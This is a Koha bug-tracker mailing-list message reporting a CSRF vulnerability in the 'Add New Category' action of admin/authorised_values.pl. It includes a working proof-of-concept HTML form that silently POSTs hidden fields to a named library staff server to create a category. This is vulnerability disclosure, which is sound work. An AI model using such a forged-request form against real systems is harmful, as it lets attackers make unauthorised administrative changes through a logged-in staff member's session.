[Koha-bugs] [Bug 24409] admin/authorised_values.pl?op=add_form : Add New Category is vulnerable for CSRF attacks
bugzilla-daemon at bugs.koha-community.org
bugzilla-daemon at bugs.koha-community.org
Mon Jan 13 13:59:25 CET 2020
https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=24409
--- Comment #1 from Aman Mishra <aman.mishra77 at gmail.com> ---
When we use this script it is allow to create new category
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form
action="http://library-staff.totalit.com/cgi-bin/koha/admin/authorised_values.pl"
method="POST">
<input type="hidden" name="category" value="AMAN8" />
<input type="hidden" name="op" value="add_category" />
<input type="hidden" name="id" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
--
You are receiving this mail because:
You are watching all bug changes.
You are the assignee for the bug.
More information about the Koha-bugs
mailing list